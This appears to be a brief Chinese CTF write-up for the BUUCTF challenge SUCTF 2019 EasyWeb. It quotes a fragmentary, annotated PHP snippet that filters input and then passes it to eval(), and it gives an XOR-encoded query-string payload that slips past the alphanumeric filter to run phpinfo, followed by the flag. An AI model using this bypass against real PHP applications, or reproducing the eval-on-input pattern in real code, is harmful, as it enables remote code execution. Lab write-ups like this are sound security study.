141，【1】buuctf web [SUCTF 2019]EasyWeb

进入靶场

代码审计

 18) {
    die('One inch long, one inch strong!');
}

// 使用正则表达式检查$hhh是否包含特定字符集（包括一些常见字符和控制字符等），如果包含则终止脚本执行
if (preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh))
    die('Try something else!');

// 获取$hhh中使用到的字符，并以字符形式返回
$character_type = count_chars($hhh, 3);
// 如果$character_type的长度大于12，终止脚本执行并输出提示信息
if (strlen($character_type) > 12) die("Almost there!");

// 执行$hhh中的PHP代码，存在严重的代码执行漏洞风险
eval($hhh);
?>

 实现了文件上传功能，并对上传文件进行了一些限制和检查

条件好苛刻

{%ff%ff%ff%ff`%a0%b8%ba%ab}

?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo 

flag{dc834348-3be9-4eff-abc1-150000430933}